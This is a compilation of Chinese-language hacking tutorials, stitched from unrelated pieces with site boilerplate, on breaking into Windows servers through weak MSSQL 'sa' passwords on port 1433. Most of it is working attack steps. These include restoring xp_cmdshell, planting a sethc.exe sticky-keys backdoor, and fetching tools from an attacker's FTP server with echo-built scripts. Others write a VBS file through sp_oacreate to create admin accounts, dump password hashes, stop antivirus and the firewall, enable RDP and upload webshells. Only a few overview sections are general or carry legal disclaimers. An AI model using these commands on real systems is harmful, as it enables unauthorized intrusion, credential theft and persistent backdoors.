1433提权全教程
利用SQL之1433端口巧妙入侵服务器

利用SQL之1433端口巧妙入侵服务器利用1433端口提权相信大家扫到很多1433 都提示用net net1 提权都说拒绝访问!且又无法上传!今天给大家针对Net没权限情况的提权方法;1、未找到储存过程!那就来修复下吧!用到SQL语句:xp_cmdshell新的恢复办法第一步先删除:drop procedure sp_addextendedprocdrop procedure sp_oacreateexec sp_dropextendedproc 'xp_cmdshell'第二步恢复:dbcc addextendedproc ("sp_oacreate","odsole70.dll")dbcc addextendedproc ("xp_cmdshell","xplog70.dll")直接恢复,不管sp_addextendedproc是不是存在图12、修复好了!又出现问题了!xplog70.dll被删除了!看来只有用授鱼的那修复法!图23、d:\应用软件\SQLServer2000MicrosoftSQLServer2000SP4简体中文企业光盘版\SP4\x86\binn\xplog70.dLL找到了哈哈!图34、恢复!用到SQL语句:第一exec sp_dropextendedproc 'xp_cmdshell'第二dbcc addextendedproc ("xp_cmdshell","d:\应用软件\SQLServer2000MicrosoftSQLServer2000SP4简体中文企业光盘版\SP4\x86\binn\xplog70.dLL")恢复好了图45、提下权 net net1 都拒绝访问!管理降低了权限!图56、于是我想到了后门提权! 居然管理也注意到了后门!写了权限!用到CMD命令:五shift键(前提是能执行DOS命令,并且sethc.exe没加保护)一般只要执行第一步!copy C:\WINDOWS\explorer.exe c:\windows\system32\sethc.execopy C:\WINDOWS\explorer.exe c:\windows\system32\dllcache\sethc.exe图67、插入一点:如果DOS不能执行命令的话!那就用SQL执行替换命令!(成功率比较低!)用到SQL语句:利用SQL分析器开shift后门(一般只要执行第一步!然后进入后,替换自己的后门)第一:declare @o intexec sp_oacreate 'scripting.filesystemobject', @o outexec sp_oamethod @o,'copyfile',null,'C:\WINDOWS\explorer.exe' ,'c:\windows\system32\sethc.exe';第二:declare @oo intexec sp_oacreate 'scripting.filesystemobject', @oo outexec sp_oamethod @oo,'copyfile',null,'c:\windows\system32\sethc.exe' ,'c:\windows\system32\dllcache\sethc.exe'; 图78、这里是本节的重点了!利用传马的方式提权!首先自己架设一个FTP 或是自己已经有FTP的!把本机的net放到FTP空间里去!随便改个名字!切记不要和net相同即可!把FTP传马方式的语句一句一句复制执行DOS命令!用到CMD命令:echo open FTP> xiuxiu.txt 注意 xiuxiu.txt你可以随意改!但是要和下的相同! echo 帐号>> xxxx.txtecho 密码>> xxxx.txtecho binary >> xxxx.txtecho get net的名字.exe>> xxxx.txtecho bye >> xxxx.txtftp -s:xxxx.txtdel xxxx.txt. /q /f图89、好了!执行下最后一条命令! 嘿嘿!发现和FTP抓鸡方式一样!有鸡来下载!图910、好了!最后一条命令执行成功了!返回以下数据!注意:服务器必须能上网!图1011、我XXxX 我自己的 net好象没加权限吧! 居然不能执行返回了以下数据!发生系统错误5...这很多人都遇见过!其实可以省掉一部分! 以后提权传net的时候不要传net 直接net1 因为所以!我也解释不清楚!图1112、嘿嘿 net1后成功了! 提权成功!图1213、远程登录成功图13。
常见提权方法

常见提权方法1. 用户提权:用户提权是指普通用户通过某种方式获取管理员权限或超级用户权限的行为。
常见的用户提权方法包括:利用弱密码、使用系统漏洞、利用特权提升程序等。
详细描述:用户提权是黑客经常使用的一种手段,通过获取管理员权限,黑客可以执行更高级别的操作,如修改系统配置、访问敏感文件等。
利用弱密码是最常见的用户提权方法之一。
黑客可以使用密码破解工具或暴力破解技术尝试猜解用户密码,一旦成功登录系统,就可以获取管理员权限。
系统漏洞也是用户提权的常见方法之一。
黑客可以通过渗透测试或漏洞扫描等方式发现系统中的漏洞,然后利用这些漏洞获取管理员权限。
某个系统可能存在一个未修补的漏洞,黑客可以利用这个漏洞上传特制的脚本,从而获得系统的控制权。
黑客还可以利用特权提升程序来提权。
这些程序的功能是在受限的用户权限下执行特权操作,如创建新用户、修改用户组等。
黑客可以通过执行这些特权提升程序来获取管理员权限,从而获得系统的完全控制权。
2. 命令注入:命令注入是指黑客通过在输入框或URL参数中注入恶意命令,从而执行非授权的操作。
常见的命令注入方法包括:通过修改URL参数、利用操作系统命令执行漏洞等。
详细描述:命令注入是一种常见的网络攻击手法,黑客通过在输入框或URL参数中注入恶意命令,从而执行非授权的操作。
黑客可以在一个搜索框中输入特定的字符串,以执行系统命令,或是通过改变URL参数来获取系统权限。
命令注入通常利用了操作系统的命令执行漏洞。
当用户传递的输入被直接用于构造系统命令时,如果没有正确进行输入验证和过滤,黑客就可以通过构造恶意输入来执行非授权的操作。
这种攻击方式在许多Web应用程序中非常常见,如论坛、博客等。
为了防止命令注入攻击,开发者应该始终对用户输入进行适当的验证和过滤。
可以使用特定的字符过滤器来禁止或转义危险的字符,或是通过使用参数化查询和预编译语句等方式防止SQL注入。
3. 文件包含漏洞:文件包含漏洞是指黑客通过利用应用程序中的文件包含功能来执行恶意代码。
1433口令提权详细过程及错误修复

前段时间我朋友给我一个sopo的软件,说是扫1433口令的,而且猜解速度很快,我就找个服务器试了试,确实不错能扫到一些比较强点的口令。
所以这段时间就玩了一下1433错误的恢复和提权。
(有人可能会说了,这有啥好研究的,sa的权限直接加用户到超管不就成了吗。
其实在sa权限下还是有很多的问题的大家可以捡有用的看没用的就略过吧)下面来说sa下执行命令错误的几种情况:1、无法装载DLL xpsql70.dll或该DLL所引用的某一DLL。
原因126(找不到指定模块。
)这种情况比较常见的,修复起来说简单也简单,但是有条件的。
这种情况要是能列出目录(用sqltools v2.0就有列目录功能)恭喜你这个有80%的情况能修复了,如果能列目录,那么只要找到xplog70.dll的路径执行以下命令就可以了。
第一步exec sp_dropextendedproc 'xp_cmdshell' (这个命令就是删除原有的cmdshell,因为已经出错了)第二步dbcc addextendedproc (“xp_cmdshell”,“c:\Program Files\Microsoft SQL Server\MSSQL\Binn\xplog70.dll”);EXEC sp_configure 'show advanced options', 0 –当然这是sql命令,用查询分析器执行。
第二步里的c:\Program Files\Microsoft SQL Server\MSSQL\Binn\xplog70.dll就是xplog70.dll的路径,这个路径是比较常见的,如果c盘没有可以找找其他盘符。
2、无法在库xpweb70.dll 中找到函数xp_cmdshell。
原因:127(找不到指定的程序。
)其实这个跟上面的126是一样的就是cmdshell出错了只要找到备份的xplog70.dll按照上面的方法就能修复了。
webshell msf 提权方法

webshell msf 提权方法
Webshell是一种可以用来执行命令的脚本,通常用于攻击者在受害者的服务器上执行恶意操作。
MSF(Metasploit Framework)是一种流行的渗透测试工具,可以用于执行各种攻击和提权操作。
以下是使用MSF进行Webshell提权的一般步骤:
1. 获取Webshell:首先,攻击者需要将Webshell上传到受害者的服务器上。
这可以通过多种方式完成,例如通过文件上传漏洞、利用Web应用程序漏洞或其他漏洞。
2. 扫描目标:一旦Webshell上传成功,攻击者可以使用MSF的扫描器来扫描目标服务器的漏洞和弱点。
这可以帮助攻击者确定哪些用户和系统具有潜在的提权机会。
3. 执行攻击:一旦攻击者确定了潜在的提权机会,他们可以使用MSF的各种攻击模块来尝试提权。
这可能包括利用系统漏洞、使用缓冲区溢出攻击、执行命令注入等。
4. 获取权限:如果攻击成功,攻击者将获得对目标服务器的权限。
这可能包括管理员权限或其他高权限。
需要注意的是,这些步骤只是一个一般性的概述,并且实际情况可能因目标系统和环境而异。
此外,使用这些技术进行非法活动是非法的,并且可能导致严重的法律后果。
因此,建议仅在合法和授权的情况下使用这些技术。
渗透测试资料--提权技巧

### 提权技巧1.cmd拒绝访问就自己上传一个cmd.exe,自己上传的cmd是不限制后缀的,还可以是 cmd.txt cmd.rar等 user不能执行有时候是net.exe被删除了,可以先试试net1,不行就自己上传一个net.exe3.cmd执行exp没回显的解决方法:com路径那里输入exp路径C:\RECYCLER\pr.exe,命令那里清空(包括/c )输入net user jianmei daxia/add4.有时候因为监控而添加用户失败,试试上传抓取hash的工具,如PwDump7.exe,得到hash之后可以进行破解,建议重定向结果到保存为1.txtcmd /c c:\windows\temp\cookies\PwDump7.exe >1.txt,在条件允许的情况下也可以用mimikatz直接抓明文5.有时候权限很松,很多命令都可以执行,但是就是增加不上用户,这时候你就要考虑是不是因为密码过于简单或是过于复杂了6.用wt.asp扫出来的目录,其中红色的文件可以替换成exp,执行命令时cmd那里输入替换的文件路径,下面清空双引号加增加用户的命令7.有时候可以添加用户,但是添加不到管理组,有可能是administrators组改名了,使用命令net user administrator查看管理组的名字8.有的cmd执行很变态,asp马里,cmd路径填上面,下面填:"c:\xxx\exp.exe whoami” 记得前面加两个双引号,不行后面也两个,不行就把exp的路径放在cmd那里,下面不变9.当添加不上用户却可以添加“增加用户的Vbs、bat)的时候,就添加一个吧,然后用“直接使服务器蓝屏重启的东东”让服务器重启就提权成功10.菜刀执行的技巧,上传cmd到可执行目录,右击cmd 虚拟终端,help 然后setpc:\windows\temp\cmd.exe 设置终端路径为:c:\windows\temp\cmd.exe11.支持aspx但跨不了目录的时候,可以上传一个读iis的vbs,执行命令列出所有网站目录,找到主站的目录就可以跨过去了,上传cscript.exe到可执行目录,接着上传iispwd.vbs到网站根目录,cmd命令cmd /c“c:\windows\temp\cookies\cscript.exe” d:\web\iispwd.vbs11.如何辨别服务器是不是内网?192.168.x.x 172.16.x.x 10.x.x.x12.安全狗下加用户的语句::for /l %i in (1,1,1000) do @net user testtest [/add&@net]() localgroup administrators test /add13.21对应的FTP、1433对应的MSSQL、3306对应的MYSQL、3389对应的远程桌面、1521对应的Oracle、5631对应的pcanywhere14.劫持提权,说到这个,想必肯定会想到lpk.dll这类工具,有时候在蛋疼怎么都加不上账户的时候,可以试试劫持shift、添加开机启动等等思路15.提权成功但3389端口没开,执行语句或是工具开3389失败的时候,可以上传rootkit.asp,登陆进去就是system权限,这时候再尝试开3389希望较大### 常用DOS命令查看版本:ver查看权限:whoami查看配置:systeminfo查看用户:net user查看进程:tasklist查看正在运行的服务:tasklist /svc查看开放的所有端口:netstat -ano查询管理用户名:query user查看搭建环境:ftp 127.0.0.1查看指定服务的路径:sc qc Mysql添加一个用户:net user jianmei daxia.asd /add提升到管理权限:net localgroup administrators jianmei /add添加用户并提升权限:net user jianmei daxia.asd /add & net localgroup administrators jianmei /add查看制定用户信息:net user jianmei查看所有管理权限的用户:net localgroup administrators加入远程桌面用户组:net localgroup “Remote Desktop Users” jianmei /add 突破最大连接数:mstsc /admin /v:127.0.0.1删除用户:net user jianmei /del删除管理员账户:net user administrator daxia.asd更改系统登陆密码:net password daxia.asd激活GUEST用户:net user guest /active:yes开启TELNET服务:net start telnet关闭麦咖啡:net stop “McAfee McShield”关闭防火墙:net stop sharedaccess查看当前目录的所有文件:dir c:\windows\查看制定文件的内容:type c:\windows\1.asp把cmd.exe复制到c:\windows的temp目录下并命名为cmd.txt:copyc:\windows\temp\cookies\cmd.exe c:\windows\temp\cmd.txt开3389端口的命令:REG ADDHKLM\SYSTEM\CurrentControlSet\Control\Terminal” “Server /v fDenyTSConnections /t REG_DWORD /d 0 /f查看补丁:dir c:\windows\>a.txt&(for %i in (KB952004.log KB956572.log KB2393802.log KB2503665.log KB2592799.log KB2621440.logKB2160329.log KB970483.log KB2124261.log KB977165.log KB958644.log)do @type [a.txt|@find](mailto:a.txt%7C@find) /i [“%i”||@echo] (mailto:%E2%80%9C%i%E2%80%9D%7C%7C@echo)%i Not Installed!)&del /f /q /a a.txt### 常见杀软360tray.exe 360实时保护ZhuDongFangYu.exe 360主动防御KSafeTray.exe 金山卫士McAfee McShield.exe 麦咖啡SafeDogUpdateCenter.exe 服务器安全狗### windows提权中敏感目录和敏感注册表的利用敏感目录目录权限提权用途C:\Program Files\默认用户组users对该目录拥有查看权可以查看服务器安装的应用软件C:\Documents and Settings\All Users\「开始」菜单\程序 Everyone拥有查看权限存放快捷方式,可以下载文件,属性查看安装路径C:\Documents and Settings\All Users\Documents Everyone完全控制权限上传执行cmd及expC:\windows\system32\inetsrv\ Everyone完全控制权限上传执行cmd及expC:\windows\my.iniC:\Program Files\MySQL\MySQL Server 5.0\my.ini默认用户组users拥有查看权限安装mysql时会将root密码写入该文件C:\windows\system32\默认用户组users拥有查看权限 Shift后门一般在该文件夹,可以下载后门破解密码C:\Documents and Settings\All Users\「开始」菜单\程序\启动 Everyone拥有查看权限可以尝试向该目录写入vbs或bat,服务器重启后运行C:\RECYCLER\D:\RECYCLER\ Everyone完全控制权限回收站目录。
简述提权及其分类

提权及其分类简介在计算机安全领域中,提权(Privilege Escalation)是指在一台计算机系统中,获取比当前用户权限更高的权限。
当攻击者成功提升自己的权限时,他们将获得更多的操作权限,从而能够更深入地渗透系统或者控制目标机器。
本文将深入探讨提权的背景、原理、分类以及常见的提权方法。
提权原理提权的原理是利用操作系统或软件的漏洞,绕过或者增加访问控制限制,从而获取更高的权限。
一般情况下,不同层次的用户拥有不同的权限,如普通用户只能进行普通操作,而超级用户(root)拥有最高权限,可以执行任意命令和访问任意资源。
提权分类根据攻击者获取提权所依赖的原始权限以及攻击手段的不同,提权可以分为以下几类。
垂直提权(Vertical Escalation)垂直提权指的是从低权限用户提升到高权限用户的过程。
攻击者通常利用系统软件或者配置错误的情况下,通过执行特定的命令或者利用漏洞获取高权限。
垂直提权可以分为以下几种类型:1.基于默认凭据的提权–利用默认的用户名和密码、加密密钥或者证书等凭据,提升权限。
–示例:攻击者通过使用常见的默认用户名和密码,“admin/admin”、“root/root”,成功登录系统并以高权限用户身份操作。
2.基于弱口令的提权–利用用户设置了弱口令或者使用了常见密码的情况下,通过暴力破解或者字典攻击获取高权限。
–示例:攻击者通过使用弱口令破解软件暴力破解用户密码,并成功获取高权限。
3.基于配置错误的提权–利用操作系统或者软件的配置错误,以及错误的访问控制策略,获取高权限。
–示例:攻击者通过访问控制列表(ACL)配置错误,绕过权限限制,获得高权限。
水平提权(Horizontal Escalation)水平提权指的是在同一权限层级中,攻击者从一个用户身份提升到另一个用户身份的过程。
攻击者通常利用系统或者应用程序中的漏洞,获取其他用户的权限。
水平提权可以分为以下几种类型:1.切换用户提权–利用操作系统或软件的漏洞,切换到拥有相同权限但不同身份的用户。
常见提权方法(一)

常见提权方法(一)常见提权方法1. 操作系统提权•提权漏洞利用:利用操作系统中已知的提权漏洞来获取系统权限,常见的漏洞包括文件权限配置错误、缓冲区溢出、逻辑漏洞等。
•拓展权限:利用操作系统提供的一些特殊权限或命令,如suid、sgid、sudo等,来获取临时的特权身份。
2. 应用程序提权•应用程序漏洞利用:利用应用程序中存在的漏洞,如SQL注入、远程代码执行、文件上传等,通过攻击者构造恶意数据或代码,来提升自己的权限。
•提权脚本/工具:使用已存在的提权脚本或工具,如Metasploit、MSFvenom等,来快速提升应用程序权限。
3. 身份伪装提权•社会工程学攻击:通过伪装成合法用户、管理员或其他高权限身份,诱导目标用户提供权限,如通过钓鱼邮件、伪装网站等手段。
•口令猜测/破解:对目标系统、应用程序的口令进行暴力猜测或使用破解工具,如字典攻击、暴力破解等。
•弱口令:对系统、应用程序等的默认账号密码或弱口令进行攻击,如admin/admin、123456等常见弱口令。
•配置错误利用:利用系统或应用程序配置错误,如未及时更新软件、未关闭不必要的服务等,从而获得系统权限。
5. 特殊设备提权•物理入侵:通过实际接触目标设备,如服务器、路由器等,进行操作,获取管理权限。
•设备漏洞利用:利用特殊设备(如网络摄像头、智能家居等)存在的漏洞,进行远程攻击,获取设备权限。
以上是常见的提权方法,在进行安全防护时,需要注意及时更新系统和应用程序、配置合理的权限控制、使用强密码、定期进行安全审计等,以有效防范提权攻击的发生。
6. 物理设备提权•USB攻击:通过携带恶意的USB设备,如USB键盘模拟器、USB 存储设备等,来获取目标设备的权限。
•直接访问:通过直接访问目标设备的控制台或终端,如服务器、交换机等,进行非法操作,获取设备权限。
•中间人攻击:通过在网络通信过程中劫持、篡改或窃取数据,获取目标系统或应用程序的权限。
常见的提权方法

常见的提权方法1. 提权方法之一是利用弱密码。
当系统或应用程序使用弱密码进行身份验证时,攻击者可以使用字典攻击、暴力破解或社交工程等技术来猜解密码并获取管理员权限。
2. 通过漏洞利用来提权也是一种常见的方法。
攻击者可以利用系统、应用程序或服务的安全漏洞,通过代码注入、缓冲区溢出等技术来获取提权权限。
3. 通过系统配置错误来提权。
攻击者可以利用系统管理员在配置文件、访问控制列表或权限设置等方面的错误来获得更高的权限。
4. 利用恶意软件进行提权也是一种常见的方法。
攻击者可以通过植入恶意软件、后门程序或恶意脚本等方式,在受害者计算机上运行,并以管理员权限执行特定操作。
5. 通过内核提权也是一种常见的方法。
攻击者可以利用操作系统内核的漏洞,通过缓冲区溢出、内存损坏或环境变量篡改等技术来获取提权权限。
6. 利用特权升级工具进行提权是另一种常见的方法。
这些工具包括Metasploit、Backtrack、Kali Linux等,它们提供了各种漏洞利用和提权的功能。
7. 利用附加权限漏洞进行提权。
当系统或应用程序授予某些用户或组额外的特权时,攻击者可以利用这些漏洞来获取提权权限。
8. 通过利用网络服务进行提权。
一些网络服务存在软件或配置漏洞,攻击者可以通过这些漏洞利用来获取提权权限。
9. 利用操作系统的弱点进行提权。
操作系统中可能存在一些安全性较弱的功能或配置,攻击者可以利用这些弱点来获取管理员权限。
10. 攻击者还可以通过社交工程和伪造身份来获取提权权限。
他们可能通过欺骗或说服其他用户来获得管理员权限,或者利用钓鱼等技术获取管理员凭据。
- 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
- 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
- 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。
1433端口提权的过程随着网络安全意识的提高,很多服务器的安全防范都非常严了,本人对web入侵是一巧不通就只会扫扫1433弱口令的服务器,于是研究一段时间,虽然进步不大,但是还是想把经验分享一下,正所谓授人以鱼不如授人以渔,而我现在正是告诉你打鱼的方法,下面就以一台服务器为例了,本例使用工具为SQL TOOLS 2.0,论坛有下,请自行搜索。
插播不是广告的广告:该工具集成度高,简单的sql指令无须使用分离器,直接在此工具中执行即可,其文件管理功能非常强大,反正我用着太顺手了,推荐一下,本文原创发布于=华夏黑客同盟论坛=()广告完毕。
把扫到的ip和sa及口令填入连接后,用dos命令功能试试列目录显示错误信息:Error Message:无法装载 DLL xplog70.dll 或该 DLL 所引用的某一 DLL。
原因: 126(找不到指定的模块。
)。
这种情况大家在提权过程中经验遇到啊,它是由于xplog70.dll这个文件被删除或者做了其他限制,导致出现这个错误的这个错误的直接后果就是sql数据库的xp_cmdshell的存储过程无法使用,无法执行命令提权自然就无从说起了,当然我们还可以考虑其他的存储过程如:sp_oacreate和sp_oamethod来直接添加帐号,或者使用沙盘指令来提权,但这台服务器,这些功能都被限制了,还是考虑下恢复xplog70.dll了,测试上传无法成功,这条路走不通了,这时就考虑用到工具的文件管理功能了看到了把,和windows的资源管理器一样好用,目录列出来了,搜索一下可以用来提权的东西吧,这里我们首先要去看看sql的安装路径里的xplog70.dll文件是否存在看到吧,xplog70.dll文件不见了,被删除了,xpweb70.dll也被改了名字了-. - 继续搜寻下其他盘看看还有什么东西d盘下有几个网站和几个论坛,这些都是有用的信息,一旦sql的错误无法恢复的时候,我们就可以考虑通过这些网站来进行提权了,网站的提权,我就是搞不定,痛苦啊==!!继续搜索在e盘下竟然有个sql2000的原始安装文件备份,怦然心动的感觉是美妙的,感谢我们亲爱的服务器管理员大人,看看这是什么====e:\备份软件\MS Sql 2000\DEVELOPER\X86\BINN\那我们就开始恢复试试吧,切换到sql命令项,输入指令exec sp_dropextendedproc 'xp_cmdshell' //这个指令是删除sql数据库的xp_cmdshell的存储过程接着输入指令,重新加载新路径的存储过程。
dbcc addextendedproc ("xp_cmdshell","e:\备份软件\MS Sql2000\DEVELOPER\X86\BINN\xplog70.dll")不用理会下面提示的error Message信息,再去列目录试试,看看是否成功了接着当然是net user 添加用户提权了,cmd命令没有被限制,添加成功,忘记查看下端口了sql命令:exec master..xp_regread'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp','PortNumber'汗啊~~终端端口竟然被改成52981了,下面去开终端用刚建的帐号登录试试了授渔之<从1433弱口令到webshell>前两天给大家做了个1433恢复提权的教程,反响不错,今天再给大家带来个1433提权拿w ebshell的教程。
由于本人对webshell提权属于bc一类,本讲只讲如果通过1433弱口令到拿到webshell,请谅解,本教程无什么技术含量,请高手不要见笑,本实例讲解,原创于=华夏黑客同盟论坛=().本实例教程使用到的工具:SQL TOOLS 2.0Isqlw分离器修正版某人的小马一只,被我加工过一点^_^洪儿制作的大马一只,在SQL TOOLS 2.0的工具中填写扫到的ip连接,运行dos列目录命令提示Error Message:xpsql.cpp: 错误5 来自CreateProcess(第737 行)这个错误的原因比较复杂,有时是cmd命令被删除,有时是cmd命令的权限被限制,等等原因吧,恢复的可能性很小,具体的,我也没研究透彻,留待以后再探讨了,或者有大牛知道的,告诉我学习一下。
收集下服务器的信息,sql指令输入EXEC xp_msver服务器是个win2003两核1.5G等相关信息都显示出来了。
下面我们考虑下其他方法,另辟蹊径吧,使用文件管理功能查询个个磁盘下的文件有没有什么可以利用来提权的有幸在D盘下发现了一个wwwroot的目录,这个目录一般为服务器里存放网站的目录,进去看看了,发现了几个网站那就去收集下里面网站的信息吧,在目录里的找到了网站的域名等相关信息,网站为a sp+MSsql的网站,下面考虑传个小马到这个网站根目录去。
我传小马的方法,有点特别,我来给你慢慢讲解,由于服务器限制了上传功能,sqltool s的上传功能无法实现,只好考虑通过sql分离器来上传了,这个上传命令很多人曾用来创建用户提权,我试过了,无法提上来,只好另做他用了。
代码:declare @o int, @f int, @t int, @ret intexec sp_oacreate 'scripting.filesystemobject', @o outexec sp_oamethod @o, 'createtextfile', @f out, 'c:\1.vbs', 1exec @ret = sp_oamethod @f, 'writeline', NULL,'set wsnetwork=CreateObject("WSCRIPT.N ETWORK")'exec @ret = sp_oamethod @f, 'writeline', NULL,'os="WinNT://"&puterName 'exec @ret = sp_oamethod @f, 'writeline', NULL,'Set ob=GetObject(os)'exec @ret = sp_oamethod @f, 'writeline', NULL,'Set oe=GetObject(os&"/Administrators,gro up")'exec @ret = sp_oamethod @f, 'writeline', NULL,'Set od=ob.Create("user","test")'exec @ret = sp_oamethod @f, 'writeline', NULL,'od.SetPassword "1234"'exec @ret = sp_oamethod @f, 'writeline', NULL,'od.SetInfo 'exec @ret = sp_oamethod @f, 'writeline', NULL,'Set of=GetObject(os&"/test",user) 'exec @ret = sp_oamethod @f, 'writeline', NULL,'oe.add os&"/test"'我的小马就是通过这个写入功能来改造上传的,小马我等下发出来。
废话说了很多了,再说明一点,这个上传需要到的sql的存储过程为sp_oacreate和sp_ oamethod这两个,如果这两个存储过程被禁用了,那就想办法恢复了,恢复的思路和上次教程一样。
提示命令已经完成,我们试试连接小马试试连接成功,填好上传路径及文件名,下面填好要上传大马的内容提示yes,那么就是上传成功了连接下大马看看这样就得到了网站的webshell了,具体怎么提权,会的人应该很容易搞定的,我也正在学习中本文只是揭示下通过1433的弱口令能做很多事,不能恢复的,我们可以通过其他途径来提权。
我想玩这个脑子要灵活,思路要开阔,菜鸟的菜文就写到这里了。
谢谢授渔之1433弱口令利用shift功能巧妙提权这是第三次发有关1433弱口令的教程了,前面两次教程也针对1433的修复和提权进行了详细的讲解,今天依然给大家带来一个1433弱口令的提权方法。
说是巧妙,其实很多大牛早就在使用了,本教程旨在对初学1433弱口令提权的菜鸟们,高手请无视。
连接弱口令主机随便运行个dos命令,看到错误提示:Error Message:xpsql.cpp: 错误5 来自CreatePr ocess(第737 行)上一期教程的服务器也是这个错误,我们绕过错误去拿webshell,是寻找服务器上的网站,利用分离器传小马,再传大马。
这期我们就讲下这个错误产生的原因,以及巧妙的修复其实也可以说是绕过他来提权。
错误5是个系统提示的错误号,CreateProcess这个是创建线程的意思,这个错误产生和系统文件cmd.exe有很大的关系,一种情况是cmd被删除,一种是cmd的权限被降低了。
(如果我这种说法有什么错误,请高手指出一下,本人理解的是这样)。
去windows\system32目录和sql的安装目录去看看,是否需要的文件都在cmd.exe存在odsole70.dll存在,为什么要看这个文件是否存在?因为我们等下要用到的存储过程需要到这个文件。
下面先查看下终端端口及开放情况sql指令输入exec master..xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Contr ol\Terminal Server\WinStations\RDP-Tcp','PortNumber'返回成功,终端端口为78打开3389连接命令mstsc连接IP:78 出现登录界面,证明78端口是对外开放的。